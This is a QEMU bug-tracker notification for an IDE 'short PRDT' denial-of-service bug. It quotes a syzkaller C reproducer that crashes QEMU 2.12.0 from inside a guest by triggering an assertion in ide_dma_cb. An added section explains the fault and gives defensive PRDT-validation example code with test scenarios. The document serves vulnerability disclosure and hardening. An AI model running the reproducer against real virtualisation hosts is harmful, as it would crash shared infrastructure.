[Bug 1777315] Re: IDE short PRDT abort
From: Thomas Huth
Subject: [Bug 1777315] Re: IDE short PRDT abort
Date: Fri, 30 Apr 2021 16:57:15 -0000
This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:
https://gitlab.com/qemu-project/qemu/-/issues/57
** Changed in: qemu
Status: In Progress => Expired
** Changed in: qemu
Assignee: John Snow (jnsnow) => (unassigned)
** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57
https://gitlab.com/qemu-project/qemu/-/issues/57
--
You received this bug notification because you are a member of qemu-devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
IDE short PRDT abort
Status in QEMU:
Expired
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0.
Run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

/* syzkaller helper: open a device node. For a0 == 0xc / 0xb the node is
 * looked up by major:minor under /dev/char or /dev/block; otherwise a0 is a
 * path template whose '#' characters are replaced, right to left, by the
 * decimal digits of a1, and a2 is passed to open() as the flags. */
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
    if (a0 == 0xc || a0 == 0xb) {
        char buf[128];
        sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block",
                (uint8_t)a1, (uint8_t)a2);
        return open(buf, O_RDWR, 0);
    } else {
        char buf[1024];
        char* hash;
        strncpy(buf, (char*)a0, sizeof(buf) - 1);
        buf[sizeof(buf) - 1] = 0;
        while ((hash = strchr(buf, '#'))) {
            *hash = '0' + (char)(a1 % 10);
            a1 /= 10;
        }
        return open(buf, a2, 0);
    }
}

/* File descriptors produced by the syscalls below; -1 until set. */
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

void loop(void)
{
    long res = 0;
    /* "/dev/sg#" with a1 == 0 becomes "/dev/sg0"; a2 == 2 is O_RDWR. */
    memcpy((void*)0x20000000, "/dev/sg#", 9);
    res = syz_open_dev(0x20000000, 0, 2);
    if (res != -1)
        r[0] = res;
    res = syscall(__NR_dup2, r[0], r[0]);
    if (res != -1)
        r[1] = res;
    /* Build the request in the scratch mapping: a zeroed legacy sg header
     * followed by 12 fixed bytes at offset 0x20 (the command bytes the sg
     * driver reads after its header); everything else stays zero. */
    *(uint8_t*)0x20000ec0 = 0;
    *(uint8_t*)0x20000ec1 = 0;
    *(uint8_t*)0x20000ec2 = 0;
    *(uint8_t*)0x20000ec3 = 0;
    *(uint32_t*)0x20000ec8 = 0;
    *(uint8_t*)0x20000ed8 = 0;
    *(uint8_t*)0x20000ed9 = 0;
    *(uint8_t*)0x20000eda = 0;
    *(uint8_t*)0x20000edb = 0;
    memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3",
           12);
    /* write() 0x323 bytes to the sg node: header, command and a short data
     * payload; the guest kernel turns this into a DMA request whose PRDT
     * covers fewer bytes than the sector count of the ATA command. */
    syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}

int main(void)
{
    /* Map 16 MiB of scratch memory at 0x20000000:
     * prot 3 = PROT_READ|PROT_WRITE, flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS. */
    syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
    loop();
    return 0;
}
This will crash qemu; the output is:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
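The assertion in the crash output compares the byte count of the DMA request (n sectors of 512 bytes) with the size of the scatter-gather list that QEMU builds from the guest-supplied PRDT; a PRDT that covers fewer bytes than the command needs fails it and takes down the whole QEMU process, which is why a guest-controlled write is enough for a denial of service. The following is an added example, not QEMU's code or a fix from the gitlab issue, of how a device model can walk a PRDT, compute that total and report the short case so the caller can truncate or fail the transfer instead of asserting. The PRD entry layout follows the bus-master IDE convention (32-bit base address, 16-bit byte count with 0 meaning 64 KiB, bit 31 as end-of-table); the 32-entry cap, the scenario numbering and the guest-memory image are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bus-master IDE PRD entry as the guest lays it out (8 bytes, little-endian):
 * dword 0 = physical base address of the data buffer,
 * dword 1 = byte count in bits 15:0 (0 encodes 65536), EOT flag in bit 31. */
#define PRD_EOT          0x80000000u
#define PRD_MAX_ENTRIES  32       /* example cap to bound the walk (assumption) */
#define SECTOR_SIZE      512

struct prdt_walk {
    uint64_t total_bytes;   /* bytes described by the entries that were read */
    int      entries;       /* entries consumed */
    bool     eot_seen;      /* the walk ended on an EOT entry */
    bool     short_prdt;    /* the PRDT cannot cover the requested sectors */
};

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr_le32(uint8_t *p, uint32_t v)
{
    p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24;
}

/* Walk the PRDT at prdt_addr inside a guest-memory image of mem_len bytes for
 * a request of nsectors sectors. Returns how many whole sectors the PRDT can
 * carry and sets out->short_prdt when that is fewer than requested. A device
 * model can then transfer that many and fail the rest; the reported QEMU
 * version instead asserts n * 512 == s->sg.size on the same condition. */
int walk_prdt(const uint8_t *mem, size_t mem_len, uint32_t prdt_addr,
              int nsectors, struct prdt_walk *out)
{
    uint64_t need = (uint64_t)nsectors * SECTOR_SIZE;
    memset(out, 0, sizeof *out);
    for (int i = 0; i < PRD_MAX_ENTRIES; i++) {
        uint64_t off = (uint64_t)prdt_addr + 8u * (uint64_t)i;
        if (off + 8 > mem_len)              /* table runs past guest RAM */
            break;
        uint32_t size_flags = rd_le32(mem + off + 4);
        uint32_t len = size_flags & 0xffffu;
        if (len == 0)
            len = 0x10000;
        out->total_bytes += len;
        out->entries++;
        if (size_flags & PRD_EOT) {
            out->eot_seen = true;
            break;
        }
        if (out->total_bytes >= need)       /* enough for the request */
            break;
    }
    uint64_t usable = out->total_bytes < need ? out->total_bytes : need;
    out->short_prdt = usable < need;
    return (int)(usable / SECTOR_SIZE);
}

/* Write one PRD entry into the constructed guest-memory image. */
static void put_prd(uint8_t *mem, uint32_t prdt_addr, int idx,
                    uint32_t buf_addr, uint32_t len, bool eot)
{
    uint8_t *p = mem + prdt_addr + 8 * idx;
    wr_le32(p, buf_addr);
    wr_le32(p + 4, (len & 0xffffu) | (eot ? PRD_EOT : 0));
}

enum { MEM_LEN = 4096, PRDT_ADDR = 0x100 };

/* Constructed scenarios (not taken from the report); returns usable sectors. */
static int build_and_walk(int which, struct prdt_walk *w)
{
    uint8_t mem[MEM_LEN];
    uint32_t prdt = PRDT_ADDR;
    int nsectors;
    memset(mem, 0, sizeof mem);
    switch (which) {
    case 0: /* exact fit: one 1024-byte buffer for a two-sector request */
        put_prd(mem, prdt, 0, 0x1000, 1024, true); nsectors = 2; break;
    case 1: /* short PRDT: 700 bytes offered for a two-sector request */
        put_prd(mem, prdt, 0, 0x1000, 700, true);  nsectors = 2; break;
    case 2: /* one sector split across two entries */
        put_prd(mem, prdt, 0, 0x1000, 256, false);
        put_prd(mem, prdt, 1, 0x2000, 256, true);  nsectors = 1; break;
    case 3: /* byte count 0 encodes 65536 bytes, i.e. 128 sectors */
        put_prd(mem, prdt, 0, 0x10000, 0, true);   nsectors = 128; break;
    default: /* PRDT pointer at the end of RAM: no entry can be read */
        prdt = MEM_LEN - 4; nsectors = 1; break;
    }
    return walk_prdt(mem, sizeof mem, prdt, nsectors, w);
}

int scenario_sectors(int which)
{
    struct prdt_walk w;
    return build_and_walk(which, &w);
}

int scenario_is_short(int which)
{
    struct prdt_walk w;
    build_and_walk(which, &w);
    return w.short_prdt;
}

int main(void)
{
    for (int i = 0; i <= 4; i++) {
        struct prdt_walk w;
        int sectors = build_and_walk(i, &w);
        printf("scenario %d: %d entries, %llu bytes, %d usable sectors%s\n",
               i, w.entries, (unsigned long long)w.total_bytes, sectors,
               w.short_prdt ? " (short PRDT: would trip n * 512 == sg.size)" : "");
    }
    return 0;
}
```

Scenario 1 is the shape of the report: the guest asks for more sectors than its PRDT backs, and the walker returns one usable sector with short_prdt set, where the assert in ide_dma_cb would have aborted the process. Scenario 4 shows the other guest-controlled input, a PRDT pointer that cannot be read at all, handled the same way.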